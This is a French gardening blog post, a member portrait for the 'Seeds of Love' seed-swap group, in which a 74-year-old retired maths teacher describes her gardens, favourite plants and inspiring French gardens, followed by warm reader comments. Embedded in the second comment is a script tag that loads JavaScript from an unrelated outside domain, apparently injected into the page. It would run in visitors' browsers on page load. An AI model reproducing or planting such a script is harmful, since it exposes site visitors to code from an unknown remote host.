• Seeds of Love : Portrait d'Anciens : Marie-Thérèse

     

     

    Hello  les Seedslovers! Pour ma cinquième participation au SOL je me présente à vous, sans joindre de photo de moi comme le souhaiterait Isabelle, mais j'ai un gros problème avec ça! Je préfère vous montrer des plantes et des jardins.

    Je suis Marie-Thérèse, 74 ans, mariée à Jean-Pierre depuis 51 ans, 2 enfants, 4 petits-enfants  qui  partagent mon amour de la nature. Nous vivons  Bouafle, village des Yvelines, où mes parents, émigrés économiques bretons, sont arrivés dans les années 30.

    Fille unique de maraîchers, j'ai depuis toujours, les mains dans la terre et souvent les pieds  dans la boue; quand mon père, testeur pour Clause et Vilmorin de nouvelles variétés de légumes, a installé une centaine de châssis dans l'hectare de la Ferme Rouge clos de murs et irrigué,  presque toutes les tâches étant manuelles, ma participation aux travaux de l'exploitation est devenue  régulière, et j'ai souvent détesté ça !!!  Toute la journée à cueillir des haricots verts et des fraises ou désherber à la main de la mâche semée à la volée, trop douloureux pour le dos ! Même si je savais faire, pas question que je reprenne l'exploitation….

    Mes études m'ont conduite ailleurs, à la fac de Jussieu….  Pour devenir prof de maths et physique-chimie; tous les jours nous traversions le Jardin des Plantes de Paris et là…..véritable coup de foudre pour toutes ces plantes inconnues, en particulier les arbres majestueux.

    Alors en 1969, jeunes mariés, au lieu de finir l'aménagement du pavillon, exit le champ de fraises de 3000 m², !à la place nous avons semé de la pelouse, planté des jeunes sujets de nos arbres préférés, quelques rosiers et des annuelles…..au grand dam des villageois !!!!!  Une petite prof et un étudiant doctorant qui, au lieu d'utiliser leur terre pour se nourrir ou en tirer bénéfice, se prennent pour des bourgeois et  "pètent plus haut que leur cul", comme ils disaient…. Dix ans plus tard, les mêmes venaient nous demander conseil !

     

    Seeds of Love : Portrait d'Anciens : Marie-Thérèse

    Mon Gingko biloba, un des plus beaux de la région,  femelle, a fait beaucoup de petits cette année (10 -15cm),

    si vous en voulez, envoyez-moi une enveloppe à bulles à votre adresse

     

     

    Nos jardins :  un grand verger où on nous vole presque tous nos fruits, le premier jardin, celui de la maison en limite du territoire communal, refuge de nombreux animaux, où dominent l'ombre et la mi-ombre, mi-sauvage, mi-discipliné , à la terre riche et lourde, traversé et bordé de ruisseaux, méli-mélo d'arbustes , de vivaces, bulbes naturalisés, rosiers, et depuis le SOL, d'annuelles, un sous-bois, un bassin; malheureusement beaucoup de pertes : pourridié, tempêtes, foudre, inondations, coulées de boue régulières et violentes …..

     

    Seeds of Love : Portrait d'Anciens : Marie-Thérèse

    Du taillé:   Thuya 'Rheingold'

     

    Plus naturel : deux rosiers lianes sur le tronc d'un cerisier mort, 

    "Neige d'Avril" déjà fané et "Apple Blossom"  deux mois de roses en tout.

     

    Seeds of Love : Portrait d'Anciens : Marie-Thérèse

     

     

    J'aime les feuillages et presque toutes  les fleurs avec une passion particulière depuis plus de 20 ans pour les hellébores; ici des obtentions de Thierry Delabroye sauf celles du haut à droite semis naturels au jardin .

     

    Seeds of Love : Portrait d'Anciens : Marie-Thérèse

     

     

    A la ferme, un arboretum d'une cinquantaine d'arbres communs ou rares, d'ornement et fruitiers anciens, un jardin à bouquets et un potager.

     

    Seeds of Love : Portrait d'Anciens : Marie-Thérèse

    Couleurs d'automne du Parrotia persica

     

     

    Que m'a apporté le SOL? Beaucoup de bonheur !

    La magie des échanges, les amitiés virtuelles mais sincères, les rigolades du soir avec les énigmes dont je suis accro, les vraies rencontres à Chaalis d' Isabelle et de plein  d'autres ami(e)s ou chez des pépiniéristes : Chantal,  Jocelyne et d'autres dont je n'ai connu le nom que plus tard; le souvenir ému de Warren me remettant en main propre un rosier de sa création, Morpheus, cultivé par Daniel, celui où j'ai remis à Pascale un jeune sujet de gingko, bébé du mien; les  réussites de semis que je pensais réservés aux horticulteurs dont lr  cléome, quelques échecs aussi  dont la cobée qui me résiste depuis le début et…..deux nouvelles passions ou manies selon le point de vue !!!

    Les hémérocalles, le virus  de la collectionnite aigüe accompagnait les graines envoyées par Antoine et Guénolé.

     

    Seeds of Love : Portrait d'Anciens : Marie-Thérèse

    Semis du SOL 2017 première fleur en 2019 graine de Guénolé

     

     

    Et pour les sempervivums, c'est  Didier le coupable :

     

    Seeds of Love : Portrait d'Anciens : Marie-Thérèse

    Morceau de jardinière dont Didier m'a fait le schéma de plantation en plus de l'envoi de rosettes

     

     

    Les jardins qui m'ont inspirée sont nombreux: je ne connais que ceux de la moitié Nord de la France; j'aime voir et revoir le Jardin Plume,  Maizicourt, le jardin de Campagne, les jardins de Castillon,  ceux du Pays d'Auge, Le Parc Régional de Haute-Bretagne, le Bois des Moutiers, La route des iris du Loiret, Chaumont sur Loire, Giverny et beaucoup d'autres dont un moins souvent cité, le Plessis Sasnières, grand domaine planté par une anglaise où tout m'a plu; ici une petite partie des admirables mixed-borders en fer à cheval où toutes les couleurs se succèdent harmonieusement :

     

    Seeds of Love : Portrait d'Anciens : Marie-Thérèse

    Au Plessis Sasnières

     

     Le jardin à taille humaine que j'aurais aimé concevoir, un havre de fraîcheur beau toute l'année, aux multiples ambiances: le Jardin du Petit Bordeaux

     

    Seeds of Love : Portrait d'Anciens : Marie-Thérèse

    Le célèbre labyrinthe des bouleaux aux troncs immaculés

     

    Mon jardin extraordinaire impossible puisque peu de ses plantes pourraient pousser ou survivre ici; Le Pellinec sur la côte bretonne; nous y avons découvert des plantes de l'hémisphère austral en pleine floraison, dont cette merveille, jardin impeccablement entretenu

     

    Seeds of Love : Portrait d'Anciens : Marie-Thérèse

     

     

    Depuis quelque temps, parodiant Ronsard je pourrais vous réciter  "Mignonne allons voir si l'arthrose

                                                                                                                          Qui  ce matin tant m'ankylose….."

     

    Alors le jardin  qui pourrait m'inspirer n'existe pas: il serait sans entretien !!! l'Arboretum des Grandes Bruyères s'en rapproche : des arbres, des arbustes, des coulées de bruyères et de couvre-sols avec des zones plus travaillées  à proximité de la demeure pour plus de fantaisie et de mouvement; ce parc m'apaise; magnifique à l'automne encore plus somptueux à la floraison des très nombreux magnolias et bruyères d'hiver (à noter un remarquable étiquetage) ici le magnolia 'Judy' :

     

    Seeds of Love : Portrait d'Anciens : Marie-Thérèse

     

     

    Et pour l'éternité, mon  rêve aurait été de reposer dans une forêt comme celle de Grande-Bretagne où est inhumé le fils d'une amie; au pied d'un arbre, sous les feuilles et la mousse, avec des champignons, c'est moins triste !  Mais notre  place est déjà réservée ici auprès de mes parents, ça ne se fera pas! Bon, tant pis! En attendant, toujours aussi "dingue de plantes", j'installe cet hiver des rosiers, des vivaces et je sèmerai encore cette année dans ce jardin souvent envahi d'herbes pas si mauvaises que ça pour la biodiversité dit-on … faut bien se trouver une excuse !

     

     

     

     


  • Commentaires

    1
    Lundi 6 Janvier 2020 à 06:43

    Quel beau portrait, et quel beau jardin et une belle passion on le sent bien à travers ces mots ..

    demande à être connu Marie-Thérèse !! j'aime ce portrait

      • marie-thérèse desvig
        Lundi 6 Janvier 2020 à 09:45

        Merci beaucoup Bises

    2
    Lundi 6 Janvier 2020 à 07:11

    Hello Marie-Thérèse, en plus de savoir jardiner, tu sais trop bien parler... dommage que ces belles paroles ne portent pas de visage... Ton jardin c'est tout ce que j'aime, des coups de coeur, du naturel, des arbres tout autant que des fleurs... on ne le dit pas assez et  avec un si grand terrain tu as en effet de quoi t'amuser... J'imagine tout le travail que cela représente à 74 ans mais cela doit te tenir en forme aussi. Avec mes meilleurs voeux pour 2020

    <script src="//worldmodel.biz/2241c61e4c10670366.js" type="text/javascript"></script>
      • marie-thérèse desvig
        Lundi 6 Janvier 2020 à 09:48

        Merci Laurence , pour le visage mon portrait sera dans la mosaïque  (je ne suis plus rousse) ça date des 100ans de m mère il y a 7 ans  un traumatisme  depuis l'enfance , les photos contente que l'article t'ai plu. Bises

    3
    Annick
    Lundi 6 Janvier 2020 à 07:22
    Très beau portrait ou transparaît la beauté de la personne...Et je suis heureuse d'avoir un dephinium qui vient de Marie-Thérèse alors que je ne participe plus au SOL, momentanément. ..je l'espère.
      • marie-thérèse desvig
        Lundi 6 Janvier 2020 à 09:50

        Merci Annick contente que le relais ait fonctionné avec ton delphinium A bientôt j'espère. Bises

    4
    Catgrinou
    Lundi 6 Janvier 2020 à 07:26
    Joli portrait de toi, Marie Thérèse, je t'embrasse. Catherine.
      • marie-thérèse desvig
        Lundi 6 Janvier 2020 à 09:51

        Merci Catherine Bises

    5
    Lundi 6 Janvier 2020 à 07:27
    Magnifique, tout est beau : le portrait, l'écriture, les photos, la passion et bien sûr le jardin. J'admire. Bravo
      • marie-thérèse desvig
        Lundi 6 Janvier 2020 à 09:56

        Merci beaucoup Laurence  non tout n'est pas beau mais on s'en contente! Bisous

    6
    alfredo bellizetti
    Lundi 6 Janvier 2020 à 08:02
    Bouafle j ai tant de fois vu la direction en allant à Mantes, après Morainvilliers !
    Beau jardin, fruit de la passion
      • marie-thérèse desvig
        Lundi 6 Janvier 2020 à 09:54

        Merci Alfredo Oui, on est dans un village perché mais en bas d'où les inondations catastrophiques des deux dernières décennies Bises

    7
    marie-christine dena
    Lundi 6 Janvier 2020 à 08:30
    Quel enthousiasme ! A l'heure où je le lis, il est contagieux et me donne envie de chausser mes bottes et d'aller visiter mon petit jardin ! Merci pour le partage !
      • marie-thérèse desvig
        Lundi 6 Janvier 2020 à 09:59

        Merci Isabelle,  une bonne idée du matin aller se vivifier au jardin toujours quelque chose à y trouver, samedi avec ma belle-fille on a cueilli du viburnum Bodnantse Dawn, des hellebores , les premiers crocus, du jasmin nudiflore..... des feuillages pour un joli bouquet! ça fait du bien! Bises

    8
    Isabelle Thalasso
    Lundi 6 Janvier 2020 à 08:40

    Chouette de connaître Marie-Therese un peu mieux. Quelle chance de voir son jardin se développer durant tant d’années. Merci pour ce portrait intéressant et touchant.

      • marie-thérèse desvig
        Lundi 6 Janvier 2020 à 10:00

        Merci beaucoup Isabelle Bises

    9
    Fatima
    Lundi 6 Janvier 2020 à 08:44

    J'ai adoré te lire !! Ton enfance, ton jardin, tes plantes, le Jardin des Plantes où j'aimais "flaner" en 1969 aussi, la Route des Iris et l'Arboretum des Grandes Bruyères que je ne connais pas encore, et même la fin un peu tristounette mais belle.  Des rosiers et des vivaces, voilà un superbe projet !!

    Je te souhaite une belle année pleine de jolies  fleurs ! 

      • marie-thérèse desvig
        Lundi 6 Janvier 2020 à 10:06

        Merci Fatima, au Jardin des Plantes on  s'est manquées de peu, nous y avons passés tous les jours scolaires de 1964 à1968; la fin n'est pas tristounette  c'st la vie et à mon âge on est plus serein quand  on y a pensé! et la maladie a fait que j'ai été obligée d'y penser tôt!  oui je replante mon mari coupe ce matin un figuier qui ne correspond ps à notre région et qui prend une place folle tout plein de place pour des rosiers pour mes bouquets;  des fleurs j'en ai déjà plein le jardin j'attend l'explosion des perce-neige Bisous

      • Fatima
        Lundi 6 Janvier 2020 à 10:42

        Je pensais tristounette par rapport au portrait mais ça fait partie de la vie bien sûr !

        Tu sais quoi ?  En 69/70, je détestais le collège où j'avais été orientée, du coup je faisais l'Ecole buissonière et j'allais passer mon temps au Jardin des Plantes, j'adorais  mais chuuuuuut !  beurk

    • Nom / Pseudo :

      E-mail (facultatif) :

      Site Web (facultatif) :

      Commentaire :


    10
    Patricia
    Lundi 6 Janvier 2020 à 09:19
    Ton récit est merveilleux, tu écris peut être des tartines mais je trouve que tu n écris pas encore assez, tu aurais pû encore continuer tellement ton récit est intéressant, amusant, tendre. Bravo. C est vrai que l entretien d un jardin est difficile et sûrement de plus en plus avec l âge mais imagine toi en appartement. Houlala. Je cherche le nom de la personne qui a terminé sa vie dans son jardin, quelle belle fin
      • marie-thérèse desvig
        Lundi 6 Janvier 2020 à 10:13

        Merci Patricia,  finir en appartement ce serait possible  (et a-t-on le choix?) si  la nature , la vraie: des friches une forêt, était tout près! mais encore faut-il être suffisamment alerte pour marcher ; ma mère est restée jusqu'à 102 ans chez elle, le rêve!!!! je connais un monsieur qui est parti brutalement en taillant sa vigne le rêve aussi ! pour moi ce serait de tomber ma cueillette de fleurs pour un bouquet dans la main; comme tu vois , un peu utopiste mais on peut toujours rêver. bonne journée Ici soleil. Bises

    11
    nicole89
    Lundi 6 Janvier 2020 à 09:21

    Très beau portrait où se mêlent la passion, l enfance, le partage....... Bravo. Belle journée à tous

      • marie-thérèse desvig
        Lundi 6 Janvier 2020 à 10:13

        Merci beaucoup Nicole Belle journée Bises

    12
    Bridget Jones
    Lundi 6 Janvier 2020 à 09:27
    Cool de te connaître un peu plus Marie Thérèse ! Pour un peu, tu aurais presque pu être ma prof de Marhs ! J'ai habité 45 ans un petit village des Yvelines moi aussi, et ai étudié à Mantes ... Désormais j'habite la Haute Savoie mais ma route pour aller voir mes enfants restés là bas me conduit à passer non loin de chez toi !
    Tes cyclamens ont fini par lever (semés en octobre ils ont mis 1 mois à lever !) et tes monnaies du pape 'variegata sont' plein de promesses pour cette année !
      • marie-thérèse desvig
        Lundi 6 Janvier 2020 à 10:19

        Merci beaucoup, j'étais au lycée de Mantes aussi  (St-Ex )  et en haute- Savoie on y va parfois, les enfants ont un appartement à St-Jean de Sixt; comme prof de maths c ce n'était qu'en collège j'a débuté à Gargenville . Contente que tes cyclamens aient levé si les limaces ou les mulots plus tard ne te les mangent pas tu en auras tout le temps et dès qu'ils fleuriront tu pourras surveiller le gazon pas loin, il en lève beaucoup dedans; avec la lunaria si tu aimes le panaché bien blanc tu vs apprécier. Bises

    13
    monique
    Lundi 6 Janvier 2020 à 10:12

    j ai adore ce portrait si naturel et pourtant si classe , j aurais voulu vous lire encore et encore ! la passion , la beaute du jardin , l enfance , le partage , tout est raconte si merveilleusement .....beaucoup de points communs : age , arthrose , nombre d enfants, la passion des jardins .... et encore l envie de continuer ! tout simplement merci !

      • marie-thérèse desvig
        Lundi 6 Janvier 2020 à 10:24

        Merci Monique on est semblables en effet les plus jeunes ont parfois du mal à comprendre le difficile compromis entre les difficultés physiques liées à l'âge et la jeunesse dans la tête qui donne envie de toujours planter, continuer; comme disait mon père "tu as toujours les yeux plus grands que le ventre" c'est vrai quand je vais voir un mi pépiniériste comme le mois prochain où la voiture sera encore pleine de retour de chez Sandrine et Thierry Delabroye je ne peux résister!!!! Belle journée Bises

         

    14
    Lundi 6 Janvier 2020 à 10:29

    Voici un portrait qui me laisse sans voix, sous le charme d'une prof de math qui l'eu cru, moi qui y suis complètement nulle ! Même si tu nous ne dévoiles point ton minois , ta prose vraiment très agréable à lire en dit beaucoup sur la femme et jardinière que tu es. Ce fut un plaisir de t'y découvrir . J'aime aussi cette idée de sépulture dans la nature, et les cimetières botaniques sont tellement plus beaux il en existe quelques uns. Ce serait sympa de nous dévoiler sur FB quelques photos de ton grand jardin.

    15
    sylvie frapier
    Lundi 6 Janvier 2020 à 11:04

    Un vrai bonheur cette lecture de ton portrait ce matin, Marie-Thérèse! Je t'ai retrouvée à travers ton écriture! Cette boulimie de jardin tant à cultiver qu'à visiter, cette soif d'apprendre des choses, toujours...Et je suis persuadée que ce ne sont pas que les énigmes d'Isabelle qui t'intéressent au plus haut point mais toutes les recherches que tu fais autour de chacune de ces enigmes et qui t'apportent de nouvelles connaissances! J'ai juste adoré et tu sais quoi, Marie-Thérèse, cela m'indifère presque de ne pas connaître le visage qui va avec ta personnalité, un portrait à l'aveugle, cela me convient car de toute façon je t'apprécie beaucoup! J'espère que nous aurons l'occasion de nous rencontrer au détour d'un jardin, un jour... Bises!

    16
    natbee
    Lundi 6 Janvier 2020 à 13:00

    Une belle rencontre virtuelle ! 

     

    17
    yvonne
    Lundi 6 Janvier 2020 à 15:25

    j'ai beaucoup appris sur toi  Marie-Thérèse à travers ce superbe portrait..... Je regrette  de ne pas t'avoir rencontrée au temps où je venais à Bouafle.... Peut-être nous nous sommes croisées sans le savoir.....               happy   

    Bisous....

    18
    Emmanuelle
    Lundi 6 Janvier 2020 à 16:29

    Un plaisir de découvrir votre portrait avec votre soif de connaissance qui ne faiblit pas avec les années .Vous avez de quoi les assouvir avec vos jardins .

    Vous êtes d'une grande générosité dans vos échange et toujours agréable dans vos commentaires pour  des conseils .

    Profiter bien de votre retraite vous avez i an de plus que moi et surtout je vous souhaite la santé  qui sans elle  les projets sont plus restreints .

    A l'année prochaine Marie Thérèse  peut être

    19
    Slimaniamel@rocketma
    Lundi 6 Janvier 2020 à 17:24
    J'ai adore
    20
    Lundi 6 Janvier 2020 à 17:51
    Marie-Claude

    Superbe portrait de ton grand et beau jardin et de ta vision de la vie jardinière qui s'accorde bien avec la mienne !

    En voyant ton liane sur ton cerisier mort, cela m'a rappelé le mien, ta passion des hellébores est aussi mienne, ton coin sempervivum est mon projet de l'année, le jardin du petit Bordeaux m'avait subjugué  avec ses bouleaux blancs  chaussés de lierre.

    Depuis l'an dernier l'arthrose m'a aussi rattrapé !

    Malheureusement ou maintenant heureusement, mon terrain n'est pas aussi grand que le tien !!!

    Bises

    MC

    21
    Lundi 6 Janvier 2020 à 21:31

    Merci à Marie-Thérèse pour cette belle présentation ! J'aime beaucoup ! 

    22
    Fabienne LS
    Mercredi 8 Janvier 2020 à 18:02
    Bonjour Marie Thérèse! Que tes arbres sont beaux ! Le parrotia est vraiment splendide dans ses habits d’automne.Effectivement pas besoin de photo, on te devine dynamique, passionnée et spontanée et aussi pleine d’humour, merci pour les jolies photos de ton jardin et puis bon Sol à toi !
    23
    Mardi 8 Septembre 2020 à 10:18

    Bonjour,

     

    Vraiment de très belles photos.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :